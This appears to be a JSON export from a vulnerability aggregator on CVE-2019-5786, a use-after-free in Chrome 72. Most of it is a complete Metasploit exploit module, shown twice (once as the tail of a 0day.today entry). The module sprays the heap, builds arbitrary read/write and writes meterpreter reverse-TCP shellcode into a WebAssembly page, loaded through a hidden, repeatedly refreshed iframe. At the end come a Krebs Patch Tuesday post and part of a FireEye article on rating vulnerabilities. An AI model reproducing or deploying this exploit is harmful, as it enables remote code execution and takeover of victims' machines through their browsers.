+ 12);\r\n let tmp2 = ta_read(aarw_ui32.bs_addr + 16);\r\n\r\n // rewrite the backing store ptr\r\n ta_write(aarw_ui32.elements_addr + 12, addr);\r\n ta_write(aarw_ui32.bs_addr + 16, addr);\r\n\r\n aarw_ui32.ui32[0] = val;\r\n\r\n ta_write(aarw_ui32.elements_addr + 12, tmp1);\r\n ta_write(aarw_ui32.bs_addr + 16, tmp2);\r\n}\r\n\r\nfunction get_rw() {\r\n // free up as much memory as possible\r\n // spray = null;\r\n // contents = null;\r\n force_gc();\r\n\r\n // attepmt reclaiming the memory pointed to by dangling pointer\r\n reclaim_mixed();\r\n\r\n // access the reclaimed region as a Uint32Array\r\n tarray = new Uint32Array(lastlast);\r\n object_prop_taidx = find_pattern();\r\n if (object_prop_taidx === null) {\r\n console.log('ERROR> failed to find marker');\r\n window.top.postMessage(`ERROR> failed to find marker`, '*');\r\n return;\r\n }\r\n\r\n // leak the absolute address of the Object\r\n const obj_absolute_addr = tarray[object_prop_taidx + 2] - 1; // the third property of the sprayed Object is self-referential\r\n ta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4\r\n console.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`);\r\n console.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`);\r\n\r\n reader_obj = get_obj_idx(object_prop_taidx);\r\n if (reader_obj == undefined) {\r\n console.log(`ERROR> failed to find object`);\r\n window.top.postMessage(`ERROR> failed to find object`, '*');\r\n return;\r\n }\r\n // now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray\r\n\r\n console.log(`addrof(reader_obj) == ${addrof(reader_obj)}`);\r\n aarw_ui32 = get_corruptable_ui32a();\r\n // arbitrary read write up after this point\r\n}\r\n\r\nvar wfunc = null;\r\nlet meterpreter = unescape(\"#{Rex::Text.to_unescape(payload.encoded)}\");\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var importObject = {\r\n imports: { imported_func: arg => console.log(arg) }\r\n };\r\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n wfunc = wasm_func;\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func) - 1;\r\n let sfi = read4(wasm_func_addr + 12) - 1;\r\n let WasmExportedFunctionData = read4(sfi + 4) - 1;\r\n let instance = read4(WasmExportedFunctionData + 8) - 1;\r\n let rwx_addr = read4(instance + 0x74);\r\n\r\n // write the shellcode to the RWX page\r\n if (meterpreter.length % 2 != 0)\r\n meterpreter += \"\\\\u9090\";\r\n\r\n for (let i = 0; i < meterpreter.length; i += 2) {\r\n write4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000);\r\n }\r\n\r\n // if we got to this point, the exploit was successful\r\n window.top.postMessage('SUCCESS', '*');\r\n console.log('success');\r\n wfunc();\r\n\r\n // invoke the shellcode\r\n //window.setTimeout(wfunc, 1000);\r\n}\r\n\r\nfunction force_gc() {\r\n // forces a garbage collection to avoid OOM kills\r\n try {\r\n var failure = new WebAssembly.Memory({initial: 32767});\r\n } catch(e) {\r\n // console.log(e.message);\r\n }\r\n}\r\n\r\nfunction init() {\r\n abs = [];\r\n tarray = 0;\r\n onprogress_cnt = 0;\r\n try_cnt = 0;\r\n last = 0, lastlast = 0;\r\n reader = new FileReader();\r\n\r\n reader.onloadend = function(evt) {\r\n try_cnt += 1;\r\n failure = false;\r\n if (onprogress_cnt < 2) {\r\n console.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`);\r\n failure = true;\r\n }\r\n\r\n if (lastlast.byteLength != f.size) {\r\n console.log(`lastlast has a different size than expected: ${lastlast.byteLength}`);\r\n failure = true;\r\n }\r\n\r\n if (failure === true) {\r\n console.log('retrying in 1 second');\r\n window.setTimeout(exploit, 1);\r\n return;\r\n }\r\n\r\n console.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`);\r\n try {\r\n // trigger the FREE\r\n myWorker.postMessage([last], [last, lastlast]);\r\n } catch(e) {\r\n // an exception with this message indicates that the FREE part of the exploit was successful\r\n if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {\r\n get_rw();\r\n rce();\r\n return;\r\n } else {\r\n console.log(e.message);\r\n }\r\n }\r\n }\r\n reader.onprogress = function(evt) {\r\n force_gc();\r\n let res = evt.target.result;\r\n // console.log(`onprogress ${onprogress_cnt}`);\r\n onprogress_cnt += 1;\r\n if (res.byteLength != f.size) {\r\n // console.log(`result has a different size than expected: ${res.byteLength}`);\r\n return;\r\n }\r\n lastlast = last;\r\n last = res;\r\n }\r\n if (spray === null) {\r\n // allocate the spray holders if needed\r\n allocate_spray_holders();\r\n }\r\n\r\n // clear the spray holder arrays\r\n clear_spray();\r\n\r\n // get rid of the reserved ArrayBuffer range, as it may interfere with the exploit\r\n try {\r\n let failure = new ArrayBuffer(1024 * 1024 * 1024);\r\n } catch (e) {\r\n console.log(e.message);\r\n }\r\n\r\n force_gc();\r\n}\r\n\r\nfunction exploit() {\r\n init();\r\n reader.readAsArrayBuffer(f);\r\n console.log(`attempt ${try_cnt} started`);\r\n}\r\n </script>\r\n </head>\r\n <body onload=\"exploit()\">\r\n </body>\r\n</html>\r\n ^\r\n send_response(cli, html)\r\n elsif request.uri =~ %r{/worker.js$}\r\n send_response(cli, 'onmessage = function (msg) { }')\r\n else\r\n uripath = datastore['URIPATH'] || get_resource\r\n uripath += '/' unless uripath.end_with? '/'\r\n html = %Q^\r\n<html>\r\n <head>\r\n <script>\r\n function iter() {\r\n let iframe = null;\r\n try {\r\n iframe = document.getElementById('myframe');\r\n document.body.removeChild(iframe);\r\n } catch (e) {}\r\n\r\n iframe = document.createElement('iframe');\r\n iframe.src = '#{uripath}exploit.html';\r\n iframe.id = 'myframe';\r\n iframe.style = \"width:0; height:0; border:0; border:none; visibility=hidden\"\r\n document.body.appendChild(iframe);\r\n console.log(document.getElementById('myframe'));\r\n }\r\n\r\n function brute() {\r\n window.setTimeout(iter, 1000);\r\n let interval = window.setInterval(iter, 15000);\r\n\r\n window.onmessage = function(e) {\r\n if (e.data.includes('SUCCESS')) {\r\n console.log('exploit successful!');\r\n window.clearInterval(interval);\r\n }\r\n console.log(e);\r\n }\r\n }\r\n </script>\r\n </head>\r\n <body onload=\"brute()\"></body>\r\n</html>\r\n ^\r\n send_response(cli, html)\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2019-05-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32669"}], "metasploit": [{"lastseen": "2020-10-15T08:15:21", "description": "This exploit takes advantage of a use after free vulnerability in Google Chrome 72.0.3626.119 running on Windows 7 x86. The FileReader.readAsArrayBuffer function can return multiple references to the same ArrayBuffer object, which can be freed and overwritten with sprayed objects. The dangling ArrayBuffer reference can be used to access the sprayed objects, allowing arbitrary memory access from Javascript. This is used to write and execute shellcode in a WebAssembly object. The shellcode is executed within the Chrome sandbox, so you must explicitly disable the sandbox for the payload to be successful.\n", "published": "2019-05-06T09:05:00", "type": "metasploit", "title": "Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5786"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/CHROME_FILEREADER_UAF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86',\n 'Description' => %q{\n This exploit takes advantage of a use after free vulnerability in Google\n Chrome 72.0.3626.119 running on Windows 7 x86.\n The FileReader.readAsArrayBuffer function can return multiple references to the\n same ArrayBuffer object, which can be freed and overwritten with sprayed objects.\n The dangling ArrayBuffer reference can be used to access the sprayed objects,\n allowing arbitrary memory access from Javascript. This is used to write and\n execute shellcode in a WebAssembly object.\n The shellcode is executed within the Chrome sandbox, so you must explicitly\n disable the sandbox for the payload to be successful.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Clement Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # Exodus Intel\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2019-5786'],\n ['URL', 'https://github.com/exodusintel/CVE-2019-5786'],\n ['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'],\n ['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'],\n ['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'],\n ],\n 'Arch' => [ ARCH_X86 ],\n 'Platform' => 'windows',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },\n 'Targets' => [ [ 'Automatic', { } ] ],\n 'DisclosureDate' => '2019-03-21'))\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri}\")\n if request.uri =~ %r{/exploit.html$}\n html = %Q^\n<html>\n <head>\n <script>\nlet myWorker = new Worker('worker.js');\nlet reader = null;\nspray = null; // nested arrays used to hold the sprayed heap contents\nlet onprogress_cnt = 0; // number of times onprogress was called in a round\nlet try_cnt = 0; // number of rounds we tried\nlet last = 0, lastlast = 0; // last two AB results from the read\nlet tarray = 0; // TypedArray constructed from the dangling ArrayBuffer\nconst string_size = 128 * 1024 * 1024;\nlet contents = String.prototype.repeat.call('Z', string_size);\nlet f = new File([contents], \"text.txt\");\nconst marker1 = 0x36313233;\nconst marker2 = 0x37414546;\n\nconst outers = 256;\nconst inners = 1024;\n\nfunction allocate_spray_holders() {\n spray = new Array(outers);\n for (let i = 0; i < outers; i++) {\n spray[i] = new Array(inners);\n }\n}\n\nfunction clear_spray() {\n for (let i = 0; i < outers; i++) {\n for (let j = 0; j < inners; j++) {\n spray[i][j] = null;\n }\n }\n}\n\nfunction reclaim_mixed() {\n // spray the heap to reclaim the freed region\n let tmp = {};\n for (let i = 0; i < outers; i++) {\n for (let j = 0; j + 2 < inners; j+=3) {\n spray[i][j] = {a: marker1, b: marker2, c: tmp};\n spray[i][j].c = spray[i][j] // self-reference to find our absolute address\n spray[i][j+1] = new Array(8);\n spray[i][j+2] = new Uint32Array(32);\n }\n }\n}\n\nfunction find_pattern() {\n const start_offset = 0x00afc000 / 4;\n for (let i = start_offset; i + 1 < string_size / 4; i++) {\n if (i < 50){\n console.log(tarray[i].toString(16));\n }\n // multiply by two because of the way SMIs are stored\n if (tarray[i] == marker1 * 2) {\n if (tarray[i+1] == marker2 * 2) {\n console.log(`found possible candidate objectat idx ${i}`);\n return i;\n }\n }\n }\n return null;\n}\n\n\nfunction get_obj_idx(prop_idx) {\n // find the index of the Object in the spray array\n tarray[prop_idx] = 0x62626262;\n for (let i = 0; i < outers; i++) {\n for (let j = 0; j < inners; j+=1) {\n try {\n if (spray[i][j].a == 0x31313131) {\n console.log(`found object idx in the spray array: ${i} ${j}`);\n return spray[i][j];\n }\n } catch (e) {}\n }\n }\n}\n\nfunction ta_read(addr) {\n // reads an absolute address through the original freed region\n // only works for ta_absolute_addr + string_size (128MiB)\n if (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) {\n return tarray[(addr-ta_absolute_addr)/4];\n }\n\n return 0;\n}\n\nfunction ta_write(addr, value) {\n // wrtie to an absolute address through the original freed region\n // only works for ta_absolute_addr + string_size (128MiB)\n if (addr % 4 || value > 2**32 - 1 ||\n addr < ta_absolute_addr ||\n addr > ta_absolute_addr + string_size) {\n console.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`);\n }\n tarray[(addr-ta_absolute_addr)/4] = value;\n}\n\nfunction get_corruptable_ui32a() {\n // finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region\n for (let i = 0; i < outers; i++) {\n for (let j = 0; j + 2 < inners; j+=3) {\n let ui32a_addr = addrof(spray[i][j+2]) - 1;\n let bs_addr = ta_read(ui32a_addr + 12) - 1;\n let elements_addr = ta_read(ui32a_addr + 8) - 1;\n // read its elements pointer\n // if the elements ptr lies inside the region we have access to\n if (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size &&\n elements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) {\n console.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`);\n return {\n bs_addr: bs_addr,\n elements_addr: elements_addr,\n ui32: spray[i][j+2],\n i: i, j: j\n }\n }\n }\n }\n}\n\nvar reader_obj = null;\nvar object_prop_taidx = null;\nvar ta_absolute_addr = null;\nvar aarw_ui32 = null;\n\nfunction addrof(leaked_obj) {\n reader_obj.a = leaked_obj;\n return tarray[object_prop_taidx];\n}\n\n\nfunction read4(addr) {\n // save the old values\n let tmp1 = ta_read(aarw_ui32.elements_addr + 12);\n let tmp2 = ta_read(aarw_ui32.bs_addr + 16);\n\n // rewrite the backing store ptr\n ta_write(aarw_ui32.elements_addr + 12, addr);\n ta_write(aarw_ui32.bs_addr + 16, addr);\n\n let val = aarw_ui32.ui32[0];\n\n ta_write(aarw_ui32.elements_addr + 12, tmp1);\n ta_write(aarw_ui32.bs_addr + 16, tmp2);\n\n return val;\n}\n\nfunction write4(addr, val) {\n // save the old values\n let tmp1 = ta_read(aarw_ui32.elements_addr + 12);\n let tmp2 = ta_read(aarw_ui32.bs_addr + 16);\n\n // rewrite the backing store ptr\n ta_write(aarw_ui32.elements_addr + 12, addr);\n ta_write(aarw_ui32.bs_addr + 16, addr);\n\n aarw_ui32.ui32[0] = val;\n\n ta_write(aarw_ui32.elements_addr + 12, tmp1);\n ta_write(aarw_ui32.bs_addr + 16, tmp2);\n}\n\nfunction get_rw() {\n // free up as much memory as possible\n // spray = null;\n // contents = null;\n force_gc();\n\n // attepmt reclaiming the memory pointed to by dangling pointer\n reclaim_mixed();\n\n // access the reclaimed region as a Uint32Array\n tarray = new Uint32Array(lastlast);\n object_prop_taidx = find_pattern();\n if (object_prop_taidx === null) {\n console.log('ERROR> failed to find marker');\n window.top.postMessage(`ERROR> failed to find marker`, '*');\n return;\n }\n\n // leak the absolute address of the Object\n const obj_absolute_addr = tarray[object_prop_taidx + 2] - 1; // the third property of the sprayed Object is self-referential\n ta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4\n console.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`);\n console.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`);\n\n reader_obj = get_obj_idx(object_prop_taidx);\n if (reader_obj == undefined) {\n console.log(`ERROR> failed to find object`);\n window.top.postMessage(`ERROR> failed to find object`, '*');\n return;\n }\n // now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray\n\n console.log(`addrof(reader_obj) == ${addrof(reader_obj)}`);\n aarw_ui32 = get_corruptable_ui32a();\n // arbitrary read write up after this point\n}\n\nvar wfunc = null;\nlet meterpreter = unescape(\"#{Rex::Text.to_unescape(payload.encoded)}\");\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => console.log(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n wfunc = wasm_func;\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func) - 1;\n let sfi = read4(wasm_func_addr + 12) - 1;\n let WasmExportedFunctionData = read4(sfi + 4) - 1;\n let instance = read4(WasmExportedFunctionData + 8) - 1;\n let rwx_addr = read4(instance + 0x74);\n\n // write the shellcode to the RWX page\n if (meterpreter.length % 2 != 0)\n meterpreter += \"\\\\u9090\";\n\n for (let i = 0; i < meterpreter.length; i += 2) {\n write4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000);\n }\n\n // if we got to this point, the exploit was successful\n window.top.postMessage('SUCCESS', '*');\n console.log('success');\n wfunc();\n\n // invoke the shellcode\n //window.setTimeout(wfunc, 1000);\n}\n\nfunction force_gc() {\n // forces a garbage collection to avoid OOM kills\n try {\n var failure = new WebAssembly.Memory({initial: 32767});\n } catch(e) {\n // console.log(e.message);\n }\n}\n\nfunction init() {\n abs = [];\n tarray = 0;\n onprogress_cnt = 0;\n try_cnt = 0;\n last = 0, lastlast = 0;\n reader = new FileReader();\n\n reader.onloadend = function(evt) {\n try_cnt += 1;\n failure = false;\n if (onprogress_cnt < 2) {\n console.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`);\n failure = true;\n }\n\n if (lastlast.byteLength != f.size) {\n console.log(`lastlast has a different size than expected: ${lastlast.byteLength}`);\n failure = true;\n }\n\n if (failure === true) {\n console.log('retrying in 1 second');\n window.setTimeout(exploit, 1);\n return;\n }\n\n console.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`);\n try {\n // trigger the FREE\n myWorker.postMessage([last], [last, lastlast]);\n } catch(e) {\n // an exception with this message indicates that the FREE part of the exploit was successful\n if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {\n get_rw();\n rce();\n return;\n } else {\n console.log(e.message);\n }\n }\n }\n reader.onprogress = function(evt) {\n force_gc();\n let res = evt.target.result;\n // console.log(`onprogress ${onprogress_cnt}`);\n onprogress_cnt += 1;\n if (res.byteLength != f.size) {\n // console.log(`result has a different size than expected: ${res.byteLength}`);\n return;\n }\n lastlast = last;\n last = res;\n }\n if (spray === null) {\n // allocate the spray holders if needed\n allocate_spray_holders();\n }\n\n // clear the spray holder arrays\n clear_spray();\n\n // get rid of the reserved ArrayBuffer range, as it may interfere with the exploit\n try {\n let failure = new ArrayBuffer(1024 * 1024 * 1024);\n } catch (e) {\n console.log(e.message);\n }\n\n force_gc();\n}\n\nfunction exploit() {\n init();\n reader.readAsArrayBuffer(f);\n console.log(`attempt ${try_cnt} started`);\n}\n </script>\n </head>\n <body onload=\"exploit()\">\n </body>\n</html>\n ^\n send_response(cli, html)\n elsif request.uri =~ %r{/worker.js$}\n send_response(cli, 'onmessage = function (msg) { }')\n else\n uripath = datastore['URIPATH'] || get_resource\n uripath += '/' unless uripath.end_with? '/'\n html = %Q^\n<html>\n <head>\n <script>\n function iter() {\n let iframe = null;\n try {\n iframe = document.getElementById('myframe');\n document.body.removeChild(iframe);\n } catch (e) {}\n\n iframe = document.createElement('iframe');\n iframe.src = '#{uripath}exploit.html';\n iframe.id = 'myframe';\n iframe.style = \"width:0; height:0; border:0; border:none; visibility=hidden\"\n document.body.appendChild(iframe);\n console.log(document.getElementById('myframe'));\n }\n\n function brute() {\n window.setTimeout(iter, 1000);\n let interval = window.setInterval(iter, 15000);\n\n window.onmessage = function(e) {\n if (e.data.includes('SUCCESS')) {\n console.log('exploit successful!');\n window.clearInterval(interval);\n }\n console.log(e);\n }\n }\n </script>\n </head>\n <body onload=\"brute()\"></body>\n</html>\n ^\n send_response(cli, html)\n end\n end\n\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/chrome_filereader_uaf.rb"}], "krebs": [{"lastseen": "2019-03-13T12:58:49", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "description": "**Microsoft** on Tuesday pushed out software updates to fix more than five dozen security vulnerabilities in its **Windows** operating systems, **Internet Explorer**, **Edge**, **Office** and **Sharepoint**. If you (ab)use Microsoft products, it's time once again to start thinking about getting your patches on. Malware or bad guys can remotely exploit roughly one-quarter of the flaws fixed in today's patch batch without any help from users.\n\nOne interesting patch from Microsoft this week comes in response to a [zero-day](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>) vulnerability ([CVE-2019-0797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0797>)) reported by researchers at **Kaspersky Lab, **who discovered the bug could be (and is being) exploited to install malicious software.\n\nMicrosoft also addressed a zero day flaw ([CVE-2019-0808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808>)) in Windows 7 and Windows Server 2008 that's been abused in conjunction with a previously unknown weakness (CVE-2019-5786) in Google's Chrome browser. A [security alert](<https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html>) from Google last week said attackers were chaining the Windows and Chrome vulnerabilities to drop malicious code onto vulnerable systems.\n\nIf you use Chrome, take a moment to make sure you have this update and that there isn't an arrow to the right of your Chrome address bar signifying the availability of new update. If there is, close out and restart the browser; it should restore whatever windows you have open on restart.\n\nThis is the third month in a row Microsoft has released patches to fix high-severity, critical flaws in the Windows component responsible for assigning Internet addresses to host computers (a.k.a. \u201cWindows DHCP client\u201d).\n\nThese are severe \"receive a bad packet of data and get owned\" type vulnerabilities. But **Allan Liska**, senior solutions architect at security firm Recorded Future, says DHCP vulnerabilities are often difficult to take advantage of, and the access needed to do so generally means there are easier ways to deploy malware.\n\nThe bulk of the remaining critical bugs fixed this month reside in Internet Explorer, Edge and Office. All told, not the craziest Patch Tuesday. Even Adobe's given us a month off (or at least a week) patching critical Flash Player bugs: The Flash player update shipped this week includes non-security updates.\n\nStaying up-to-date on Windows patches is good. Updating only after you've backed up your important data and files is even better. A good backup means you're not pulling your hair out if the odd buggy patch causes problems booting the system.\n\n**Windows 10** likes to install patches all in one go and reboot your computer on its own schedule. Microsoft doesn\u2019t make it easy for Windows 10 users to change this setting, [but it is possible](<https://www.howtogeek.com/224471/how-to-prevent-windows-10-from-automatically-downloading-updates/>). For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in **Windows Update**.\n\nAs always, if you experience any problems installing any of these patches this month, please feel free to leave a comment about it below; there\u2019s a good chance other readers have experienced the same and may even chime in here with some helpful tips.\n\nFurther reading:\n\n[Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2019/03/12/march-2019-patch-tuesday-65-vulns-18-critical-rces-in-dhcp-client-adobe-vulns>)\n\n[SANS Internet Storm Center](<https://isc.sans.edu/forums/diary/Microsoft+March+2019+Patch+Tuesday/24742/>)\n\n[Ask Woody](<https://www.askwoody.com/2019/march-2019-patch-tuesday-patches/>)\n\n[ZDNet](<https://www.zdnet.com/article/microsoft-march-patch-tuesday-comes-with-fixes-for-two-windows-zero-days/>)", "modified": "2019-03-13T04:55:28", "published": "2019-03-13T04:55:28", "id": "KREBS:8CCFB0DC3A6FAC8000722BE0DCBA640E", "href": "https://krebsonsecurity.com/2019/03/patch-tuesday-march-2019-edition/", "type": "krebs", "title": "Patch Tuesday, March 2019 Edition", "cvss": {"score": 0.0, "vector": "NONE"}}], "fireeye": [{"lastseen": "2020-11-23T01:38:38", "bulletinFamily": "info", "cvelist": ["CVE-2019-0808", "CVE-2019-12650", "CVE-2019-19781", "CVE-2019-5786"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nEvery information security practitioner knows that patching vulnerabilities is one of the first steps towards a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype about the newest \u201cbranded\u201d vulnerability on the news, it\u2019s hard to know where to start.\n\nThe National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a [score](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator>) for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.\n\n \nFigure 1: How Mandiant Rates Vulnerabilities\n\n#### Assisting Patch Prioritization\n\nWe believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated \u2018high\u2019 and \u2018critical\u2019 compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting \u2018critical\u2019 and \u2018high\u2019 designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a \u2018critical\u2019 rating (Figure 3).\n\n \nFigure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities\n\n \nFigure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities\n\n#### Mandiant Vulnerability Ratings Defined\n\nOur rating system includes both an exploitation rating and a risk rating:\n\nThe _Exploitation Rating_ is an in indication of what is occurring in the wild.\n\n \nFigure 4: Mandiant Exploitation Rating definitions\n\nThe_ Risk Rating_ is our expert assessment of what impact an attacker could have on a targeted organization, if they were to exploit a vulnerability.\n\n \nFigure 5: Mandiant Risk Rating definitions\n\nWe intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.\n\nFor example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation\u2014including by APT41\u2014the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.\n\nCVE-2019-19781 is a path traversal vulnerability of the Citrix Application Delivery Controller (ADC) 13.0 that when exploited, allows an attacker to remotely execute arbitrary code. Due to the nature of these systems, successful exploitation could lead to further compromises of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored in hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second order effects of exploitation of this vulnerability could be severe.\n\nWe described widespread exploitation of CVE-2019-19781 in our [blog post](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>) earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we [observed](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>) APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.\n\n#### Factors Considered in Ratings\n\nOur vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.\n\n_Impact considerations_ help determine what impact exploitation of the vulnerability can have on a targeted system.\n\n**Impact Type**\n\n| \n\n**Impact Consideration** \n \n---|--- \n \nExploitation Consequence\n\n| \n\nThe result of successful exploitation, such as privilege escalation or remote code execution \n \nConfidentiality Impact\n\n| \n\nThe extent to which exploitation can compromise the confidentiality of data on the impacted system \n \nIntegrity Impact\n\n| \n\nThe extent to which exploitation allows attackers to alter information in impacted systems \n \nAvailability Impact\n\n| \n\nThe extent to which exploitation disrupts or restricts access to data or systems \n \n_Mitigating factors_ affect an attacker\u2019s likelihood of successful exploitation.\n\n**Mitigating Factor**\n\n| \n\n**Mitigating Consideration** \n \n---|--- \n 